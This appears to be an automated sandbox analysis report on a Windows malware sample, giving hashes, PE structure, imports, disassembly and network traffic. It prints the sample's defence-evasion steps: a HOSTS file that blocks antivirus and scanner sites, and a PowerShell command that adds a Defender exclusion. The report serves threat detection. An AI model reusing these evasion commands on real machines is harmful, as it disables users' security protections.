                                                                                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..0.0.0.0 virustotal.com.0.0.0.0 www.virustotal.com.0.0.0.0 avast.com.0.0.0.0 www.avast.com.0.0.0.0 totalav.com.0.0.0.0 www.totalav.com.0.0.0.0 scanguard.com.0.0.0.0 www.scanguar

                                                                                                                            \Device\Null

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):938
                                                                                                                            Entropy (8bit):4.923311029897411
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:nt0vndauY/ko+3bdh5wt0gVuY/ko+3bdh5m:nticV+3OtZV+3U
                                                                                                                            MD5:19337BA4C4D41BAAD6889F3C15D74656
                                                                                                                            SHA1:9EBDBE84E3C10C18F0CF4FD41B07D69EFDBE79BF
                                                                                                                            SHA-256:38C62D71037FF4484A8463BC98F0A800C46E3F53E4F517BC7AFED80EAE22898F
                                                                                                                            SHA-512:53209FCD982F91BFC92408954CF2FFA1CD9A13B9DAA9398F9A39F048E59315FD91E079016FD556E438802B586E8E9A50AEE6CE8606FE91FEE10C8641E1861898
                                                                                                                            Malicious:false
                                                                                                                            Preview:Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\Desktop\file.exe..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                            Entropy (8bit):6.688564756632582
                                                                                                                            TrID:
                                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                            File name:file.exe
                                                                                                                            File size:26'987'008 bytes
                                                                                                                            MD5:9096f57fa44b8f20eebf2008a9598eec
                                                                                                                            SHA1:42128a72a214368618f5693df45b901232f80496
                                                                                                                            SHA256:f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934
                                                                                                                            SHA512:ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2
                                                                                                                            SSDEEP:393216:sN/jPM/y7B3Zdp1uPGiSPWw1JDte23oZohZ:sN/wq7Vfp1uVS+w162Ph
                                                                                                                            TLSH:86478D43F8A10AE4E0AE8534C6759266BB717C684F3467D76B90F7242F7BBC09A79340
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................'.|.....................@..........................................`... ............................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x1400013d0
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x140000000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                            TLS Callbacks:0x409470a0, 0x1, 0x40947070, 0x1
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:6
                                                                                                                            OS Version Minor:1
                                                                                                                            File Version Major:6
                                                                                                                            File Version Minor:1
                                                                                                                            Subsystem Version Major:6
                                                                                                                            Subsystem Version Minor:1
                                                                                                                            Import Hash:775059ed24d97a19ee581b6a1a412da2

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [01950B45h]
                                                                                                                            mov dword ptr [eax], 00000001h
                                                                                                                            call 00007FEA5D34DE9Fh
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop dword ptr [eax]
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [01950B25h]
                                                                                                                            mov dword ptr [eax], 00000000h
                                                                                                                            call 00007FEA5D34DE7Fh
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop dword ptr [eax]
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            call 00007FEA5DC9519Ch
                                                                                                                            dec eax
                                                                                                                            cmp eax, 01h
                                                                                                                            sbb eax, eax
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            ret
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            dec eax
                                                                                                                            lea ecx, dword ptr [00000009h]
                                                                                                                            jmp 00007FEA5D34E0D9h
                                                                                                                            nop dword ptr [eax+00h]
                                                                                                                            ret
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop
                                                                                                                            nop word ptr [eax+eax+00000000h]
                                                                                                                            nop word ptr [eax+eax+00h]
                                                                                                                            jmp dword ptr [eax]
                                                                                                                            inc edi
                                                                                                                            outsd
                                                                                                                            and byte ptr [edx+75h], ah
                                                                                                                            imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                                                            and ah, byte ptr [eax+ebx*2+4Bh]
                                                                                                                            inc ecx
                                                                                                                            dec ecx
                                                                                                                            jne 00007FEA5D34E136h
                                                                                                                            push ebp
                                                                                                                            sub eax, 6758496Dh
                                                                                                                            push ecx
                                                                                                                            xor ch, byte ptr [ebp+33h]
                                                                                                                            xor dword ptr [eax], edi
                                                                                                                            jne 00007FEA5D34E131h
                                                                                                                            outsb
                                                                                                                            pop dx
                                                                                                                            jne 00007FEA5D34E138h
                                                                                                                            xor dh, byte ptr [78694C2Dh]
                                                                                                                            imul edx, dword ptr [edi+6Ch], 46h
                                                                                                                            aaa
                                                                                                                            jnc 00007FEA5D34E13Bh

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x19f50000x259.edata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x19f60000x2568.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x19530000x3dc2c.pdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x19fb0000x25b08.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1951b400x28.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x19f68d80x798.idata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x947ab00x947c00f0aa1fcf38129e46eaca109450b1ae8dunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x9490000x7921d00x79220034b1a81203702778864a6295a080a48cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .rdata0x10dc0000x876c500x876e00aa147227f145c8c41bce7a2988318831unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .pdata0x19530000x3dc2c0x3de00c5ca3e4258fb53de8ede214bb43fdf80False0.40912247474747476data6.016441234687043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .xdata0x19910000x50680x52000869b2ee2ddae9743592e863fce9bd0aFalse0.09436928353658537data2.711309238841643IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .bss0x19970000x5db800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .edata0x19f50000x2590x400eb2f763a206fb0b331d62d7a404e906aFalse0.3837890625data3.7871484219967946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .idata0x19f60000x25680x260007571f01c91d851558dc531bed664e4aFalse0.30694901315789475data4.877429762045649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .CRT0x19f90000x600x200caf539b79007e315d8862108fd0ecd3dFalse0.068359375data0.3178744142480582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .tls0x19fa0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .reloc0x19fb0000x25b080x25c000802e413e11072c62a682edbf7b91551False0.1823972992549669data5.444999649956561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            GDI32.dllChoosePixelFormat, CreateBitmap, CreateDCW, CreateDIBSection, CreateRectRgn, DeleteDC, DeleteObject, DescribePixelFormat, GetDeviceCaps, GetDeviceGammaRamp, SetDeviceGammaRamp, SetPixelFormat, SwapBuffers
                                                                                                                            KERNEL32.dllAddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateThread, CreateWaitableTimerExW, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetLastError, GetModuleHandleExW, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetThreadContext, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, MultiByteToWideChar, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetProcessPriorityBoost, SetThreadContext, SetThreadExecutionState, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VerSetConditionMask, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                                                                                            api-ms-win-crt-convert-l1-1-0.dllstrtol, strtoul
                                                                                                                            api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron
                                                                                                                            api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
                                                                                                                            api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                                                                            api-ms-win-crt-private-l1-1-0.dllmemcpy, memmove, strstr
                                                                                                                            api-ms-win-crt-runtime-l1-1-0.dll__p___argc, __p___argv, __p___wargv, _beginthread, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, _wassert, abort, exit, signal
                                                                                                                            api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, fwrite
                                                                                                                            api-ms-win-crt-string-l1-1-0.dllmemset, strcmp, strcpy, strcspn, strlen, strncmp, strncpy, strspn, strtok, wcscmp, wcscpy
                                                                                                                            api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _tzset
                                                                                                                            api-ms-win-crt-utility-l1-1-0.dllqsort
                                                                                                                            OPENGL32.dllwglGetProcAddress
                                                                                                                            SHELL32.dllDragAcceptFiles, DragFinish, DragQueryFileW, DragQueryPoint
                                                                                                                            USER32.dllAdjustWindowRectEx, BringWindowToTop, ChangeDisplaySettingsExW, ClientToScreen, ClipCursor, CloseClipboard, CreateIconIndirect, CreateWindowExW, DefWindowProcW, DestroyIcon, DestroyWindow, DispatchMessageW, EmptyClipboard, EnumDisplayDevicesW, EnumDisplayMonitors, EnumDisplaySettingsExW, EnumDisplaySettingsW, FlashWindow, GetActiveWindow, GetClassLongPtrW, GetClientRect, GetClipboardData, GetCursorPos, GetDC, GetKeyState, GetLayeredWindowAttributes, GetMessageTime, GetMonitorInfoW, GetPropW, GetRawInputData, GetRawInputDeviceInfoA, GetRawInputDeviceList, GetSystemMetrics, GetWindowLongW, GetWindowPlacement, GetWindowRect, IsIconic, IsWindowVisible, IsZoomed, LoadCursorW, LoadImageW, MapVirtualKeyW, MonitorFromWindow, MoveWindow, MsgWaitForMultipleObjects, OffsetRect, OpenClipboard, PeekMessageW, PostMessageW, PtInRect, RegisterClassExW, RegisterDeviceNotificationW, RegisterRawInputDevices, ReleaseCapture, ReleaseDC, RemovePropW, ScreenToClient, SendMessageW, SetCapture, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetLayeredWindowAttributes, SetPropW, SetRect, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextW, ShowWindow, SystemParametersInfoW, ToUnicode, TrackMouseEvent, TranslateMessage, UnregisterClassW, UnregisterDeviceNotification, WaitMessage, WindowFromPoint

                                                                                                                            Exports

                                                                                                                            NameOrdinalAddress
                                                                                                                            _cgo_dummy_export10x1419f49b0
                                                                                                                            glowDebugCallback_gl2120x14092d810
                                                                                                                            goCharCB30x1409190a0
                                                                                                                            goCharModsCB40x1409190f0
                                                                                                                            goCursorEnterCB50x140918f60
                                                                                                                            goCursorPosCB60x140918ef0
                                                                                                                            goDropCB70x140919150
                                                                                                                            goErrorCB80x140918dc0
                                                                                                                            goFramebufferSizeCB90x1409192c0
                                                                                                                            goJoystickCB100x140918e20
                                                                                                                            goKeyCB110x140919020
                                                                                                                            goMonitorCB120x1409191b0
                                                                                                                            goMouseButtonCB130x140918e80
                                                                                                                            goScrollCB140x140918fb0
                                                                                                                            goWindowCloseCB150x140919320
                                                                                                                            goWindowContentScaleCB160x140919490
                                                                                                                            goWindowFocusCB170x1409193f0
                                                                                                                            goWindowIconifyCB180x140919440
                                                                                                                            goWindowMaximizeCB190x140919360
                                                                                                                            goWindowPosCB200x140919200
                                                                                                                            goWindowRefreshCB210x1409193b0
                                                                                                                            goWindowSizeCB220x140919260

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 26, 2024 20:38:16.574278116 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:16.699877024 CET8049713208.95.112.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:16.699978113 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:16.700757027 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:16.827594042 CET8049713208.95.112.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:17.804083109 CET8049713208.95.112.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:17.805345058 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:17.925419092 CET8049713208.95.112.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:18.125679970 CET8049713208.95.112.1192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:18.176301956 CET4971380192.168.2.7208.95.112.1
                                                                                                                            Nov 26, 2024 20:38:18.729903936 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:18.729937077 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:18.730004072 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:18.733814955 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:18.733829975 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.205585957 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.205744982 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.205754995 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.205883026 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.205888987 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.206990004 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.207093954 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.241015911 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.241015911 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.241029978 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.241091967 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.296027899 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:20.296040058 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:20.343362093 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.096477032 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.096631050 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.096815109 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.096838951 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.096854925 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.096864939 CET49720443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.096869946 CET4434972051.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.348949909 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.348994970 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.349066973 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.434794903 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.434809923 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.501127958 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.501162052 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:21.501224995 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.501581907 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:21.501605034 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.854721069 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.910202980 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.922972918 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.972706079 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.982846022 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.982860088 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.982989073 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.982992887 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.983036995 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.983057976 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.983335972 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.983340979 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.984168053 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.984230995 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:22.984458923 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.984476089 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:22.984519958 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.270840883 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.271059036 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.319981098 CET49728443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.320024014 CET4434972851.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.328414917 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328531981 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328542948 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.328557014 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328619957 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.328726053 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328733921 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.328872919 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328905106 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.328906059 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.328948021 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329014063 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329022884 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329082966 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329082966 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329122066 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329200029 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329206944 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329219103 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329229116 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329232931 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329247952 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329248905 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329267025 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329299927 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329559088 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329571009 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329583883 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329586983 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329610109 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329617977 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329637051 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329649925 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329663038 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329674959 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329674959 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329684019 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329694986 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329701900 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329725981 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329726934 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329746962 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329756021 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329761982 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329775095 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329782009 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329919100 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329929113 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.329946041 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.329956055 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330039024 CET49729443192.168.2.751.210.106.44
                                                                                                                            Nov 26, 2024 20:38:23.330048084 CET4434972951.210.106.44192.168.2.7
                                                                                                                            Nov 26, 2024 20:38:23.330059052 CET49729443192.168.2.751.210.106.44
